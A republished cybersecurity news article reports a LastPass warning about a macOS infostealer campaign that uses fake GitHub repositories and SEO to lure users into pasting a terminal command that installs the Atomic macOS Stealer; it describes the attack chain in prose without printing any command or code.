Cybersecurity News Kinetic Potential

Widespread Infostealer Campaign Targeting macOS Users

Mon, 09/22/2025 - 12:22 / 0 Comments

Threat actors are impersonating known brands in an ongoing, widespread campaign aimed at infecting macOS users with information stealer malware, LastPass warns.

As part of the infection chain, the hackers are relying on fraudulent GitHub repositories claiming to provide macOS software from various companies and use search engine optimization (SEO) so that links to the repositories appear at the top of search pages.

“In the case of LastPass, the fraudulent repositories redirected potential victims to a repository that downloads the Atomic infostealer malware,” LastPass says.

LastPass identified two GitHub sites impersonating its brand, which were posted on the Microsoft-owned code-sharing platform on 16 September, and which have been taken down since.

Both were posted by a user named ‘modhopmduck476’ and contained links claiming to enable users to install ‘LastPass on MacBook’, but redirected to the same malicious page.

A page claiming to offer ‘LastPass Premium on MacBook’ was redirecting to macprograms-pro[.]com, where users were instructed to copy and paste a command into a terminal window.

The command initiates a CURL request to an encoded URL, resulting in an ‘Update’ payload being downloaded to the Temp directory.

The payload was the Atomic macOS Stealer (AMOS) infostealer, which has been used in numerous attacks since 2023. In August, CrowdStrike warned of an increase in fraudulent advertisements delivering a variant of AMOS called SHAMOS.

LastPass has observed the threat actors impersonating financial institutions, password managers, technology companies, AI tools, cryptocurrency wallets, and other businesses.

To evade detection, the threat actors used multiple GitHub usernames to create other fake GitHub pages, which followed a similar naming pattern, where the name of the targeted company and Mac-related terminology were used.

The campaign observed by LastPass has been ongoing since at least July, when Deriv security researcher Dhiraj Mishra warned that Homebrew users were targeted with malicious ads leading to a fake GitHub repository.

The attacks, Mishra pointed out, exploited users’ trust in Google Ads and GitHub, and installed the official Homebrew application to hide the execution of a malicious payload in the background.

This article was originally published by Security Week. Please check their website for the original content.

Add new comment

About text formats

Plain text

  • No HTML tags allowed.
  • Lines and paragraphs break automatically.
  • Web page addresses and email addresses turn into links automatically.
CAPTCHA This question is for testing whether or not you are a human visitor and to prevent automated spam submissions.
2 + 3 =
Solve this simple math problem and enter the result. E.g. for 1+3, enter 4.

Share The Story


Stay informed - subscribe to our newsletter.
The subscriber's email address.

Recent Posts